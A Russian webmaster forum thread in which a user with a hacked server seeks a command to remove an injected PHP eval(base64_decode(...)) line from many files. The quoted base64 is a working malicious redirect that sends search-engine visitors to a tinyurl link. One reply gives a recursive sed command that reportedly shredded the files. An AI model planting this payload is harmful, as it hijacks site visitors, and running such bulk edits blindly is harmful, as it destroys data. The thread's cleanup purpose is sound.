- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте.
Взломали сервер.
Нужно в куче файлов удалить код:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90aW55dXJsLmNvbS9rcmcyOTNqIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));Пытаюсь сделать это командой
find -type f -name \*.py -exec sed -i -r 's/regexp1/regexp2/g' {} \;Где regexp1 - то что ищем, regexp2 - то чем заменяем.
Но из-за того, что коде, в середине встречается слеш / - бьет ошибку
Какой командой можно снести этот код, во всех найденных файлах?
И бэкапов у Вас, конечно, нет, так?
PCRE - eval\(base64_decode\("DQ.+?p9"\)\);
В POSIX возможно знак вопроса не требуется.
Для sed спец символы кажется еще надо экранировать. Поэкспериментируйте на каком нибудь файле
И бэкапов у Вас, конечно, нет, так?
Бекапы есть, но уже пораженные. Такое впечатление, что вирус сидел и молчал с середины мая, а только на днях начал активность.
Нужно в куче файлов удалить код:
вот такой штукой на днях пользовался. Не пойдёт?
вот такой штукой на днях пользовался. Не пойдёт?
Ага, спасибо. :)
romagromov, еще можно вот так:
find -type f -name \*.py -exec sed -i -r 's#regexp1#regexp2#g' {} \;romagromov, еще можно вот так:
find -type f -name \*.py -exec sed -i -r 's#regexp1#regexp2#g' {} \;А если в коде regexp1 будет находится символ # ?
Я думаю, на этом все закончится...
Мне в поддержке думали целый день, и придумали такое:
for FILE in $(grep --no-messages --with-filename --fixed-strings --recursive 'eval(base64_decode' ./ | cut --delimiter=':' --fields=1 | sort | uniq); do cp -ipv "$FILE" /var/backups/unmodified_files/${FILE}.${RANDOM}; sed --in-place 's/<?php.*\;/<?php/g' "$FILE"; done > /var/backups/unmodified_files.listЭто примечание к команде:
Подобная команда может привести к деструктивным последствиям, поэтому при её составлении необходима аккуратность.
Так и вышло, во-первых ничего не сохранилось в указанную папку, ну и файлы разорвало в клочья, пришлось восстанавливаться из зараженного бекапа.
Решил вопрос по старинке - все в архив, скачал. Поиск и замена в файлах. На mac нашел бесплатную программку TextFinderX.app, на винде когда-то тоже чем-то подобным менял.
Но из-за того, что коде, в середине встречается слеш / - бьет ошибку
А что, экранирование уже отменили?